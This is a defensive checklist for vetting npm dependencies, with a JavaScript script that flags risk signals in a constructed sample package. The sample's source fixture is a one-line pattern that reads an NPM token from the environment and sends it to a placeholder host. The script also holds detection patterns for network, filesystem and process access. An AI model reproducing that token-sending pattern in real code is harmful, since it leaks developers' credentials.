C10
Level: Advanced
Third-Party SDK Risk Assessment
Time: 30 min
When: adding new dependencies
Format: Before adding a new npm package or third-party service, work through the checklist below and keep the answers with the change that introduces the dependency, so the decision can be revisited when the package changes hands or ships a surprising update.
Assessment checklist:
Package name: _____
Basic information:
- [ ] Weekly downloads? (Fewer than 100K is a reason to look closer; more than 100K is not a pass. A high count means wide use and more eyes on the code, but widely used packages have been hijacked, and download counts can be inflated.)
- [ ] Last published? (More than a year without a release usually means nobody is fixing bugs or advisories. Check whether the repository still has activity; a small, finished utility can be fine, a large stale one rarely is.)
- [ ] GitHub stars? (Reference only. Stars are cheap to acquire and say nothing about what is in the published tarball, which can differ from the repository.)
- [ ] Number of maintainers? (A single maintainer is a bus-factor risk and also a single account whose compromise ships a malicious version to every user.)
- [ ] Is the name exactly the package you meant? (Typosquats differ by one character or a swapped scope; copy the name from the project's own README, not from memory.)
- [ ] How many transitive dependencies does it pull in? (Every one of them is a package you are also trusting; `npm ls --all` after a scratch install shows the tree.)
- [ ] Any known security vulnerabilities? (`npm audit` lists published advisories for the versions in your lockfile. It cannot flag a malicious package that has no advisory yet, so a clean audit is necessary, not sufficient.)
Permissions:
- [ ] Does it need network access, and does the code actually use it? (grep the unpacked tarball for `http`, `https`, `net`, `tls`, `dns` and `fetch`; a string formatter with an HTTP client is a red flag.)
- [ ] Does it need to read/write the filesystem? (Look for `fs` usage outside of reading its own config.)
- [ ] Does it need environment variables? (`process.env` is where tokens and credentials live; a package that reads it and also has network access deserves a line-by-line read.)
- [ ] Does it declare `preinstall`, `install` or `postinstall` scripts? (These run on `npm install`, before you ever import the package, and are the usual vehicle for malicious versions. Consider `npm install --ignore-scripts` if the package does not genuinely need a build step.)
- [ ] Does it send data to external servers? (Telemetry, crash reporting and update checks all count; note what is sent and whether it can be disabled.)
Alternatives:
- [ ] Are there more widely used or better maintained alternatives, including something already in the dependency tree?
- [ ] Can you skip this package and write the small piece you actually need yourself? (A few lines of your own code are easier to review than a transitive dependency tree.)
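The basic-information and permissions items can be partly automated so that the review starts from facts rather than impressions. The script below is an added example and is not part of the original checklist. It assumes (these are assumptions, not facts about any real package) that the registry document comes from `https://registry.npmjs.org/<name>`, the weekly download count from `https://api.npmjs.org/downloads/point/last-week/<name>`, the advisory summary from `npm audit --json`, and the sources from the unpacked `npm pack` tarball; here all four inputs are constructed samples for a hypothetical package named `example-widget`, so it runs offline.

```javascript
// Added example, not code from the original checklist. All inputs are
// constructed samples; see the lead-in for where each would come from.

const DAY_MS = 24 * 60 * 60 * 1000;

// Thresholds taken from the checklist; tune them per project.
const MIN_WEEKLY_DOWNLOADS = 100000;
const MAX_DAYS_SINCE_PUBLISH = 365;

// Static signals for each permission question. A hit means "read this
// code", not "this package is malicious".
const PERMISSION_PATTERNS = {
  network: /\brequire\(["'](?:node:)?(?:https?|net|tls|dns|dgram)["']\)|\bfetch\(/,
  filesystem: /\brequire\(["'](?:node:)?fs(?:\/promises)?["']\)/,
  environment: /\bprocess\.env\b/,
  child_process: /\brequire\(["'](?:node:)?child_process["']\)/,
};

// sources: { "<path in tarball>": "<file contents>" }
function scanPermissions(sources) {
  const hits = new Set();
  for (const text of Object.values(sources)) {
    for (const [perm, re] of Object.entries(PERMISSION_PATTERNS)) {
      if (re.test(text)) hits.add(perm);
    }
  }
  return [...hits].sort();
}

function assessPackage({ registry, weeklyDownloads, audit, sources, now = Date.now() }) {
  const findings = [];
  const latest = registry["dist-tags"].latest;
  const ageDays = Math.floor((now - Date.parse(registry.time.modified)) / DAY_MS);

  if (weeklyDownloads < MIN_WEEKLY_DOWNLOADS) {
    findings.push(`low adoption: ${weeklyDownloads} weekly downloads`);
  }
  if (ageDays > MAX_DAYS_SINCE_PUBLISH) {
    findings.push(`stale: last publish ${ageDays} days ago`);
  }
  if (registry.maintainers.length < 2) {
    findings.push("bus factor: single maintainer");
  }
  // Lifecycle hooks run arbitrary code on `npm install`, before import.
  const scripts = registry.versions[latest].scripts || {};
  const hooks = ["preinstall", "install", "postinstall"].filter((h) => h in scripts);
  if (hooks.length > 0) {
    findings.push(`install hooks: ${hooks.join(", ")}`);
  }
  // `npm audit --json` summarises counts under metadata.vulnerabilities.
  const v = audit.metadata.vulnerabilities;
  const serious = (v.high || 0) + (v.critical || 0);
  if (serious > 0) {
    findings.push(`${serious} high/critical advisories`);
  }
  const permissions = scanPermissions(sources);
  if (permissions.includes("network") && permissions.includes("environment")) {
    findings.push("reads environment and has network access: check for exfiltration");
  }
  return { name: registry.name, version: latest, ageDays, permissions, findings };
}

// Constructed sample for the hypothetical package "example-widget".
const SAMPLE = {
  registry: {
    name: "example-widget",
    "dist-tags": { latest: "1.4.0" },
    time: { modified: "2022-01-01T00:00:00.000Z" },
    maintainers: [{ name: "solo-dev" }],
    versions: { "1.4.0": { scripts: { postinstall: "node setup.js" } } },
  },
  weeklyDownloads: 42000,
  audit: { metadata: { vulnerabilities: { info: 0, low: 1, moderate: 0, high: 1, critical: 0, total: 2 } } },
  sources: {
    "index.js": 'const https = require("https");\nmodule.exports = () => { const t = process.env.NPM_TOKEN; https.request({ host: "example.invalid" }).end(t); };',
    "setup.js": 'const fs = require("fs");\nfs.writeFileSync(".widgetrc", "{}");',
  },
  now: Date.parse("2024-01-01T00:00:00.000Z"),
};

console.log(JSON.stringify(assessPackage(SAMPLE), null, 2));
```

For the sample above the report lists six findings (low adoption, stale, single maintainer, postinstall hook, one high advisory, and environment-plus-network) and the permissions `environment`, `filesystem`, `network`. The scan is deliberately crude: it catches the common `require` forms but not dynamic imports or obfuscated strings, so an empty permissions list on a package whose code you have not read is still not a pass.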